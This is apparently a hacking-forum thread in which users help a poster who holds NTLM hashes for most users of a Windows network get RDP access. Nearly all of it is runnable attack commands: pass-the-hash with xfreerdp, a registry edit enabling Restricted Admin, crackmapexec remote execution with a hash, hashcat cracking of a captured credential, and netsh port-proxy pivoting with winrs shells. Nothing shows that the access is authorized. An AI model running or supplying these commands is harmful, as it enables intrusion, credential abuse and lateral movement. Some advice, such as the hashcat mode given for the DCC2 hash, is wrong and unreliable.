rdp account restriction

[Sec13B]

I have just ntlm hash from almost user, but right now i can access only the few local rdp ip,
My question , is any method to can run : reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp /uest /pth:5385930931b42e516a906cfe4e332ade /v:172.31.209.10 +window-drag
The only port open is 3389 .

 

[thecount]

what about other hosts , try maybe you can rdp to them using diffrent path

 

[Sec13B]

same at all need DisableRestrictedAdmin if i use xfreerdp

 

[thecount]

same at all need DisableRestrictedAdmin if i use xfreerdp

as I see on the photo your in Lab not in corp outside the network ?! also this happen cuz you use hash try to crack it and use clear password

 

[Sec13B]

passwd i think are like this uneI9uwPTPTaCEex0mRC

i try a faster way :
faster way " hashcat -m 5600 ntlmv2.txt /usr/share/wordlists/rockyou.txt --force"
ntlmv2.txt is lsa : $DCC2$10240#test#13eb0f5636fd27651267d11d4c9ab83c

 

[3ToN]

crackmapexec rdp 172.31.209.10 -u test -H 5385930931b42e516a906cfe4e332ade -x 'cmd /c powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force'

 

[Sec13B]

-x and -X (powershell) work only smb

 

[Sec13B]

In powershell

Get-Service iphlpsvc
netsh interface portproxy add v4tov4 listenaddress=10.10.10.10 listenport=4444 connectaddress=172.31.209.10 connectport=3389
mstsc.exe /v:10.10.10.10:4444
netsh interface portproxy show all
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=10.10.10.10
netsh interface portproxy reset

WinRm port : 5985

Test-NetConnection -ComputerName 172.31.209.10-Port 5985
winrs -r:http://172.31.209.10:5985 "hostname"
winrs -r:http://172.31.209.10:5985 "cmd"
winrs -r:comp.windomain.local -u:user -p:P@ssw0rd "powershell"

"WinRM -?". Examples:

winrs -r:https://myserver.com command
winrs -r:myserver.com -usessl command
winrs -r:myserver command
winrs -r:http://127.0.0.1 command
winrs -r:http://169.51.2.101:80 -unencrypted command
winrs -r:https://[::FFFF:129.144.52.38] command
winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command
winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig
winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:tEMP=d:\temp config.cmd
winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789
winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share

 

[thecount]

In powershell

Get-Service iphlpsvc
netsh interface portproxy add v4tov4 listenaddress=10.10.10.10 listenport=4444 connectaddress=172.31.209.10 connectport=3389
mstsc.exe /v:10.10.10.10:4444
netsh interface portproxy show all
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=10.10.10.10
netsh interface portproxy reset

Посмотреть вложение 93750


Посмотреть вложение 93751

WinRm port : 5985

Test-NetConnection -ComputerName 172.31.209.10-Port 5985
winrs -r:http://172.31.209.10:5985 "hostname"
winrs -r:http://172.31.209.10:5985 "cmd"
winrs -r:comp.windomain.local -u:user -p:P@ssw0rd "powershell"

Посмотреть вложение 93748



"WinRM -?". Examples:

winrs -r:https://myserver.com command
winrs -r:myserver.com -usessl command
winrs -r:myserver command
winrs -r:http://127.0.0.1 command
winrs -r:http://169.51.2.101:80 -unencrypted command
winrs -r:https://[::FFFF:129.144.52.38] command
winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command
winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig
winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:tEMP=d:\temp config.cmd
winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789
winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share

did it work for you ? or what is that !

 

[Sec13B]

mstsc not work with ntlm pwd.